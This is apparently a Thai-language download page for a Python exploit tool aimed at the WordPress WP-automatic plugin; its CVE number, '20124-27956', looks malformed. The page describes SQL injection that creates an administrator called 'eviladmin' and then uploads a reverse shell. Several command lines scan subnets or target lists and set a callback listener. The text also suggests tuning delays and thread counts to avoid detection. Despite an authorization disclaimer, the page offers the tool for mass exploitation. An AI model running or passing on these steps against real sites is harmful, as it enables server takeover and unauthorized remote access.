หน้าแรก>แหล่งข้อมูลการสร้างเว็บไซต์>ข้อมูลเว็บไซต์
ดาวน์โหลด

การสร้างบัญชีผู้ดูแลระบบ WordPress และ Shell Reverse (CVE-20124-27956)

สคริปต์ Python นี้ทำให้กระบวนการสร้างบัญชีผู้ดูแลระบบใหม่ในไซต์ WordPress โดยอัตโนมัติและดำเนินการเชลล์ย้อนกลับบนเซิร์ฟเวอร์เป้าหมาย มันใช้ช่องโหว่การฉีด CSV ของ WP-automatic ปลั๊กอินเพื่อดำเนินการสืบค้น SQL บนฐานข้อมูล WordPress และเข้าถึงการเข้าถึงผู้ดูแลระบบ

อัปเดต? ‍♀

เพิ่มเทมเพลตนิวเคลียส

เพิ่มวิธีการเพิ่มเติมสำหรับการสนับสนุนเป้าหมายการโจมตีครั้งใหญ่

เพิ่มการรองรับหลายเป้าหมาย

เพิ่ม Auto Find Target โดย Scanners Base IP หรือไฟล์ TXT

วิธีใช้

  • นี่คือตัวอย่างขั้นสูงเพิ่มเติมเกี่ยวกับวิธีการใช้สคริปต์โดยสมมติว่าคุณมีการอนุญาตที่เหมาะสมในการทดสอบระบบเป้าหมาย

  1. การสแกนเครือข่ายย่อย : หากคุณต้องการสแกนเครือข่ายย่อยสำหรับการติดตั้ง WordPress ที่มีช่องโหว่คุณสามารถใช้ตัวเลือก --subnet ตัวอย่างเช่น: 

     python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0

    คำสั่งนี้จะสแกนซับเน็ต 192.168.1.0/24 สำหรับไซต์ WordPress ด้วยปลั๊กอิน WP อัตโนมัติที่มีช่องโหว่และพยายามใช้ประโยชน์จากพวกเขาโดยใช้การตั้งค่าผู้ฟังที่ให้ไว้

  2. การปรับแต่งความล่าช้า : ความล่าช้าระหว่างคำขอสามารถปรับได้โดยใช้ตัวเลือก --delay ความล่าช้าที่สูงขึ้นอาจช่วยหลีกเลี่ยงการตรวจจับหรือ จำกัด อัตราในขณะที่ความล่าช้าที่ต่ำกว่าสามารถเพิ่มความเร็วในกระบวนการแสวงหาผลประโยชน์ ตัวอย่างเช่น: 

     python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5

    คำสั่งนี้จะใช้ความล่าช้า 2.5 วินาทีระหว่างคำขอ

  3. การใช้ผู้ฟังระยะไกล : หากผู้ฟังของคุณตั้งค่าบนเครื่องระยะไกลคุณสามารถระบุที่อยู่ IP และพอร์ตโดยใช้ตัวเลือก --lhost และ --lport ตัวอย่างเช่น: 

     python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0

    คำสั่งนี้จะเชื่อมต่อกลับไปยังผู้ฟังที่ 192.168.1.100:8080

  4. การเพิ่มจำนวนเธรด : คุณสามารถเพิ่มจำนวนเธรดที่ใช้โดยสคริปต์ด้วยตัวเลือก --threads สิ่งนี้สามารถเพิ่มความเร็วในกระบวนการแสวงหาผลประโยชน์ แต่อาจเพิ่มโอกาสในการตรวจจับหรือทำให้เกิดปัญหาเกี่ยวกับการ จำกัด อัตรา ตัวอย่างเช่น: 

     python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0

    คำสั่งนี้จะใช้ 20 เธรดสำหรับการแสวงประโยชน์

ข้อกำหนดเบื้องต้น

  • Python 3.x
  • requests ไลบรารี (ติดตั้งผ่าน pip install requests )
  • NetCat (สำหรับการตั้งค่าผู้ฟังเพื่อเชื่อมต่อกับ Shell Reverse)

การใช้งาน

  1. แทนที่ตัวแปร domain ในสคริปต์ด้วย URL ของไซต์ WordPress เป้าหมาย
  2. เรียกใช้สคริปต์ Python
  3. เมื่อสคริปต์ถูกดำเนินการแล้วมันจะสร้างผู้ใช้ผู้ดูแลระบบใหม่ชื่อ eviladmin ตั้งรหัสผ่านและกำหนดสิทธิ์การดูแลระบบ
  4. จากนั้นจะอัปโหลดและเรียกใช้งาน payload เชลล์ย้อนกลับบนเซิร์ฟเวอร์เป้าหมาย
  5. ตั้งค่าผู้ฟัง NetCat เพื่อเชื่อมต่อกับเชลล์ย้อนกลับโดยใช้พอร์ตที่ระบุ

หมายเหตุ: ตรวจสอบให้แน่ใจว่าคุณได้รับอนุญาตและอนุญาตที่เหมาะสมก่อนที่จะเรียกใช้สคริปต์นี้เนื่องจากอาจนำไปสู่ช่องโหว่ด้านความปลอดภัยและผลทางกฎหมายหากใช้ในทางที่ผิด

คำเตือน

สคริปต์นี้มีไว้เพื่อการศึกษาและการทดสอบเท่านั้น ผู้เขียนจะไม่รับผิดชอบต่อการใช้สคริปต์นี้โดยไม่ได้รับอนุญาตหรือผิดกฎหมาย ใช้มันตามความเสี่ยงของคุณเอง

ขยาย
ข้อมูลเพิ่มเติม
แอปที่เกี่ยวข้อง
แนะนำสำหรับคุณ
ข้อมูลที่เกี่ยวข้อง ทั้งหมด